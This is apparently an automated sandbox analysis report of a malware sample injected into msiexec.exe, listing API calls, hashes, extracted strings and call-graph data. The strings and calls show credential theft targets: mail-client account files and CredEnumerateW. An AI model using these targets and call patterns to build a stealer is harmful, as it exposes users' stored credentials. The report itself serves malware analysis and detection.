                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,2120190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 2120165A
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,2120190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 21201661
                                                              • lstrcatW.KERNEL32(00001008,?,?,?,?,?,2120190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 21201686
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: lstrcatlstrlen$_strcat_strlen
                                                              • String ID:
                                                              • API String ID: 1922816806-0
                                                              • Opcode ID: e8d7591658e41f0736fa48c72dddf1596bea8eea24b18f8301a0e439d25951b7
                                                              • Instruction ID: 39e2e099bf468e2aa406f7cc97aa44a983ce922b7ebd78263ab00328eed3b14f
                                                              • Opcode Fuzzy Hash: e8d7591658e41f0736fa48c72dddf1596bea8eea24b18f8301a0e439d25951b7
                                                              • Instruction Fuzzy Hash: 6E21C536900215AFDB04DBA4DC84FFE7BB8EFA8710F24811AF604AB181DB35F54187A5

                                                              Control-flow Graph

                                                              APIs
                                                              • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 21201038
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 2120104B
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 21201061
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 21201075
                                                              • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 21201090
                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 212010B8
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$AttributesFilelstrcat
                                                              • String ID:
                                                              • API String ID: 3594823470-0
                                                              • Opcode ID: 1c241eb24bbc2fd9b09e80c82350d06494c20dcedf0d9fb04ef0f4fd50361b0f
                                                              • Instruction ID: 3d70dd4649671f8b353c4ab339614e7d2680e27ad2292d4dd1ac9f12df3b64af
                                                              • Opcode Fuzzy Hash: 1c241eb24bbc2fd9b09e80c82350d06494c20dcedf0d9fb04ef0f4fd50361b0f
                                                              • Instruction Fuzzy Hash: AF21833590032D9BCF14DBA0DC48EDF3769EF64314F104356F999971A1DA31DA85CB40
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,21203518,212023F1,21201F17), ref: 21203864
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 21203872
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2120388B
                                                              • SetLastError.KERNEL32(00000000,?,21203518,212023F1,21201F17), ref: 212038DD
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 0f897e9ba3ddadfc2e05a3d7a5fbe43eb8ea3a4a06a7b9f819433e68e61215e8
                                                              • Instruction ID: a72f27abc2228a707c388704ed5ac14e3cc1a8f268292ed59c2fc8062bc0db8c
                                                              • Opcode Fuzzy Hash: 0f897e9ba3ddadfc2e05a3d7a5fbe43eb8ea3a4a06a7b9f819433e68e61215e8
                                                              • Instruction Fuzzy Hash: 4101F73264DB135EF70596796E8D9672B9AEF36778B20037AF210950E2FF1659018340
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,21206C6C), ref: 21205AFA
                                                              • _free.LIBCMT ref: 21205B2D
                                                              • _free.LIBCMT ref: 21205B55
                                                              • SetLastError.KERNEL32(00000000,?,?,21206C6C), ref: 21205B62
                                                              • SetLastError.KERNEL32(00000000,?,?,21206C6C), ref: 21205B6E
                                                              • _abort.LIBCMT ref: 21205B74
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID:
                                                              • API String ID: 3160817290-0
                                                              • Opcode ID: ad01a9fadf588a4547ebb4fd49a1a5ca70f154321f92cc813bf747194fa2c3ef
                                                              • Instruction ID: 4489c8a040e13d3adb87c5c58630f56628ee297dd9cd580ce6fcd3677caa8882
                                                              • Opcode Fuzzy Hash: ad01a9fadf588a4547ebb4fd49a1a5ca70f154321f92cc813bf747194fa2c3ef
                                                              • Instruction Fuzzy Hash: 43F0CD31545D036FD30257346C4DE1F1AAE8FF2771B150314FA18A6185FE29A9024664
                                                              APIs
                                                                • Part of subcall function 21201E89: lstrlenW.KERNEL32(?,?,?,?,?,212010DF,?,?,?,00000000), ref: 21201E9A
                                                                • Part of subcall function 21201E89: lstrcatW.KERNEL32(?,?,?,212010DF,?,?,?,00000000), ref: 21201EAC
                                                                • Part of subcall function 21201E89: lstrlenW.KERNEL32(?,?,212010DF,?,?,?,00000000), ref: 21201EB3
                                                                • Part of subcall function 21201E89: lstrlenW.KERNEL32(?,?,212010DF,?,?,?,00000000), ref: 21201EC8
                                                                • Part of subcall function 21201E89: lstrcatW.KERNEL32(?,212010DF,?,212010DF,?,?,?,00000000), ref: 21201ED3
                                                              • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 2120122A
                                                                • Part of subcall function 2120173A: _strlen.LIBCMT ref: 21201855
                                                                • Part of subcall function 2120173A: _strlen.LIBCMT ref: 21201869
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                              • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                              • API String ID: 4036392271-1520055953
                                                              • Opcode ID: a87451d36c0a7f4932f07bec1a0f8571bec86282d4a575255a2a065d6a18fead
                                                              • Instruction ID: c28a1f50be0bbbe5923741927f2ca3f795407e7e0b69970a2b98fa5da40fe2de
                                                              • Opcode Fuzzy Hash: a87451d36c0a7f4932f07bec1a0f8571bec86282d4a575255a2a065d6a18fead
                                                              • Instruction Fuzzy Hash: 092193B9A502286BEB10DBE0EC81FFD7339EFA0714F000656F604EB1D5E6B16E808759
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,21204AEA,?,?,21204A8A,?,21212238,0000000C,21204BBD,00000000,00000000), ref: 21204B59
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 21204B6C
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,21204AEA,?,?,21204A8A,?,21212238,0000000C,21204BBD,00000000,00000000,?,21202082), ref: 21204B8F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 48068b45145096657f8c6e8a3f0816e9a156d17fd8fcabe7139d3f03565d0a1c
                                                              • Instruction ID: 40e2d3ff3cc3242481697eac8dad53f3ca464521e9eb173877bab2fc7415e2e2
                                                              • Opcode Fuzzy Hash: 48068b45145096657f8c6e8a3f0816e9a156d17fd8fcabe7139d3f03565d0a1c
                                                              • Instruction Fuzzy Hash: B2F03C3194150DBBDB119F95CC08BAEBFBAEF25361F004268FA09A6150EB369941CB90
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 2120715C
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2120717F
                                                                • Part of subcall function 212056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21205702
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 212071A5
                                                              • _free.LIBCMT ref: 212071B8
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 212071C7
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: 917a979f97769dcdeb8d652f2d51bf5c610f3acfdd08f717eab513b1ea5c3181
                                                              • Instruction ID: 96e1996636f8fc18a24365d9a636c27d120308af93c09a4f1491ef6189fd35ad
                                                              • Opcode Fuzzy Hash: 917a979f97769dcdeb8d652f2d51bf5c610f3acfdd08f717eab513b1ea5c3181
                                                              • Instruction Fuzzy Hash: E201AC72602216BF33114ABA5C4CD7BBE7FDEE7AA0310036DBE44C7280EE669C0191B4
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00000000,2120636D,21205713,00000000,?,21202249,?,?,21201D66,00000000,?,?,00000000), ref: 21205B7F
                                                              • _free.LIBCMT ref: 21205BB4
                                                              • _free.LIBCMT ref: 21205BDB
                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21205BE8
                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21205BF1
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: 305e2687e09f780e66c797155e878c0c8744fb7727a37872d9715de7cf737990
                                                              • Instruction ID: 05f5bb24d70aec96f2e16282e570cc5e689846431e2400fbe8fc4d95480789b9
                                                              • Opcode Fuzzy Hash: 305e2687e09f780e66c797155e878c0c8744fb7727a37872d9715de7cf737990
                                                              • Instruction Fuzzy Hash: 8801A976155E03AB930396345C88E2F2A6EDBF27B07110314FD19A615AFE75B9024664
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,212010DF,?,?,?,00000000), ref: 21201E9A
                                                              • lstrcatW.KERNEL32(?,?,?,212010DF,?,?,?,00000000), ref: 21201EAC
                                                              • lstrlenW.KERNEL32(?,?,212010DF,?,?,?,00000000), ref: 21201EB3
                                                              • lstrlenW.KERNEL32(?,?,212010DF,?,?,?,00000000), ref: 21201EC8
                                                              • lstrcatW.KERNEL32(?,212010DF,?,212010DF,?,?,?,00000000), ref: 21201ED3
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$lstrcat
                                                              • String ID:
                                                              • API String ID: 493641738-0
                                                              • Opcode ID: 9e38fb956bd8f5762d1fdc8399ab2f2e1333007473ca6d046321d11b95845165
                                                              • Instruction ID: e1732a5001b83d7d04d79f9bfb5d0602caf1a123bd723eec0de88976a2a09dd2
                                                              • Opcode Fuzzy Hash: 9e38fb956bd8f5762d1fdc8399ab2f2e1333007473ca6d046321d11b95845165
                                                              • Instruction Fuzzy Hash: EAF089261411147AE7216759AC89F7F7F7CEFD6B60F44011DF70C83190DB56584293B5
                                                              APIs
                                                              • _free.LIBCMT ref: 212091D0
                                                                • Part of subcall function 2120571E: HeapFree.KERNEL32(00000000,00000000,?,2120924F,?,00000000,?,00000000,?,21209276,?,00000007,?,?,21207E5A,?), ref: 21205734
                                                                • Part of subcall function 2120571E: GetLastError.KERNEL32(?,?,2120924F,?,00000000,?,00000000,?,21209276,?,00000007,?,?,21207E5A,?,?), ref: 21205746
                                                              • _free.LIBCMT ref: 212091E2
                                                              • _free.LIBCMT ref: 212091F4
                                                              • _free.LIBCMT ref: 21209206
                                                              • _free.LIBCMT ref: 21209218
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 70dffa2ffc0c2dbe9ce527ef4a24c50dd71cb00b18b77c48bb70d043eb08d3e7
                                                              • Instruction ID: ef550265e79d2b8ce6cbdd0b86a97fedb1318b47d22a931d8fe1fffb18e1ee39
                                                              • Opcode Fuzzy Hash: 70dffa2ffc0c2dbe9ce527ef4a24c50dd71cb00b18b77c48bb70d043eb08d3e7
                                                              • Instruction Fuzzy Hash: FCF0EC715552429B9B18DE58DAC9C177FDEAB317207510A09FA4AE7505CA34F8808A54
                                                              APIs
                                                              • _free.LIBCMT ref: 2120536F
                                                                • Part of subcall function 2120571E: HeapFree.KERNEL32(00000000,00000000,?,2120924F,?,00000000,?,00000000,?,21209276,?,00000007,?,?,21207E5A,?), ref: 21205734
                                                                • Part of subcall function 2120571E: GetLastError.KERNEL32(?,?,2120924F,?,00000000,?,00000000,?,21209276,?,00000007,?,?,21207E5A,?,?), ref: 21205746
                                                              • _free.LIBCMT ref: 21205381
                                                              • _free.LIBCMT ref: 21205394
                                                              • _free.LIBCMT ref: 212053A5
                                                              • _free.LIBCMT ref: 212053B6
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: a2c5ac9e55471e0242e7ef8be9d1ee9b95b94516e5c1b54ea82a45e3c1f68b51
                                                              • Instruction ID: 504e99f2f33d153000bc866b3cc43f202c87f0c7bc5a23c9d23e9baa02d4ec76
                                                              • Opcode Fuzzy Hash: a2c5ac9e55471e0242e7ef8be9d1ee9b95b94516e5c1b54ea82a45e3c1f68b51
                                                              • Instruction Fuzzy Hash: 23F03A74994126EF8F25DF2C9E8851A3BBAB739B30341024AFC149326ADF391402AB84
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 21204C1D
                                                              • _free.LIBCMT ref: 21204CE8
                                                              • _free.LIBCMT ref: 21204CF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Windows\System32\msiexec.exe
                                                              • API String ID: 2506810119-1382325751
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,21206FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 21208731
                                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 212087BA
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 212087CC
                                                              • __freea.LIBCMT ref: 212087D5
                                                                • Part of subcall function 212056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21205702
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                              • String ID:
                                                              • API String ID: 2652629310-0
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(2120C7DD), ref: 2120C7E6
                                                              • GetModuleHandleA.KERNEL32(?,2120C7DD), ref: 2120C838
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 2120C860
                                                                • Part of subcall function 2120C803: GetProcAddress.KERNEL32(00000000,2120C7F4), ref: 2120C804
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID:
                                                              • API String ID: 1646373207-0
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,21201D66,00000000,00000000,?,21205C88,21201D66,00000000,00000000,00000000,?,21205E85,00000006,FlsSetValue), ref: 21205D13
                                                              • GetLastError.KERNEL32(?,21205C88,21201D66,00000000,00000000,00000000,?,21205E85,00000006,FlsSetValue,2120E190,FlsSetValue,00000000,00000364,?,21205BC8), ref: 21205D1F
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,21205C88,21201D66,00000000,00000000,00000000,?,21205E85,00000006,FlsSetValue,2120E190,FlsSetValue,00000000), ref: 21205D2D
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              APIs
                                                              • _free.LIBCMT ref: 2120655C
                                                                • Part of subcall function 212062BC: IsProcessorFeaturePresent.KERNEL32(00000017,212062AB,00000000,?,?,?,?,00000016,?,?,212062B8,00000000,00000000,00000000,00000000,00000000), ref: 212062BE
                                                                • Part of subcall function 212062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 212062E0
                                                                • Part of subcall function 212062BC: TerminateProcess.KERNEL32(00000000), ref: 212062E7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                              • String ID: *?$.
                                                              • API String ID: 2667617558-3972193922
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: : $Se.
                                                              • API String ID: 4218353326-4089948878
                                                              APIs
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 21202903
                                                                • Part of subcall function 212035D2: RaiseException.KERNEL32(?,?,?,21202925,00000000,00000000,00000000,?,?,?,?,?,21202925,?,212121B8), ref: 21203632
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 21202920
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                              • String ID: Unknown exception
                                                              • API String ID: 3476068407-410509341
                                                              APIs
                                                              • GetOEMCP.KERNEL32(00000000,?,?,21206C7C,?), ref: 21206A1E
                                                              • GetACP.KERNEL32(00000000,?,?,21206C7C,?), ref: 21206A35
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: |l !
                                                              • API String ID: 0-2559428224
                                                              • Opcode ID: 1896c7359c9947570b6d4c043961408e200b890966b5ba9f86364d8ace8192b1
                                                              • Instruction ID: 6e93ae40cfb464488592ee47db0fd40d525add98cd26d772d4b328f78737d5d9
                                                              • Opcode Fuzzy Hash: 1896c7359c9947570b6d4c043961408e200b890966b5ba9f86364d8ace8192b1
                                                              • Instruction Fuzzy Hash: 63F0493084011A8FDB00EB69C94CBAD7BB5FB21335F148348F5788A1D2DB765A86CB81

                                                              Execution Graph

                                                              Execution Coverage: 5.6%
                                                              Dynamic/Decrypted Code Coverage: 0%
                                                              Signature Coverage: 1.3%
                                                              Total number of Nodes: 2000
                                                              Total number of Limit Nodes: 75
38298->38302 38299->38265 38303 44578d 38300->38303 38304 445389 255 API calls 38301->38304 38727 409b98 GetFileAttributesW 38302->38727 38303->38273 38310 40b2cc 27 API calls 38303->38310 38304->38167 38309 40b2cc 27 API calls 38305->38309 38308->38185 38308->38253 38311 445eab 38309->38311 38312 4457a8 38310->38312 38313 409d1f 6 API calls 38311->38313 38314 409d1f 6 API calls 38312->38314 38315 445ebf 38313->38315 38316 4457b8 38314->38316 38317 40ae18 9 API calls 38315->38317 38621 409b98 GetFileAttributesW 38316->38621 38327 445ef5 38317->38327 38319 4457c7 38319->38273 38320 4087b3 337 API calls 38319->38320 38320->38273 38321 40ae51 9 API calls 38321->38327 38322 445f5c 38323 40aebe FindClose 38322->38323 38323->38284 38324 40add4 2 API calls 38324->38327 38325 40b2cc 27 API calls 38325->38327 38326 409d1f 6 API calls 38326->38327 38327->38321 38327->38322 38327->38324 38327->38325 38327->38326 38329 445f3a 38327->38329 38725 409b98 GetFileAttributesW 38327->38725 38726 445093 23 API calls 38329->38726 38331->38128 38332->38131 38333->38128 38334->38123 38336 40c775 38335->38336 38728 40b1ab free free 38336->38728 38338 40c788 38729 40b1ab free free 38338->38729 38340 40c790 38730 40b1ab free free 38340->38730 38342 40c798 38343 40aa04 free 38342->38343 38344 40c7a0 38343->38344 38731 40c274 memset 38344->38731 38349 40a8ab 9 API calls 38350 40c7c3 38349->38350 38351 40a8ab 9 API calls 38350->38351 38352 40c7d0 38351->38352 38760 40c3c3 38352->38760 38356 40c877 38365 40bdb0 38356->38365 38357 40c86c 38786 4053fe 39 API calls 38357->38786 38360 40c813 _wcslwr 38784 40c634 49 API calls 38360->38784 38362 40c829 wcslen 38363 40c7e5 38362->38363 38363->38356 38363->38357 38783 40a706 wcslen memcpy 38363->38783 38785 40c634 49 API calls 38363->38785 38949 404363 38365->38949 38369 40bdee 38372 40b2cc 27 API calls 38369->38372 38374 40bf5d 38369->38374 38370 40bddf CredEnumerateW 38370->38369 38373 40be02 wcslen 38372->38373 38373->38374 38382 40be1e 38373->38382 
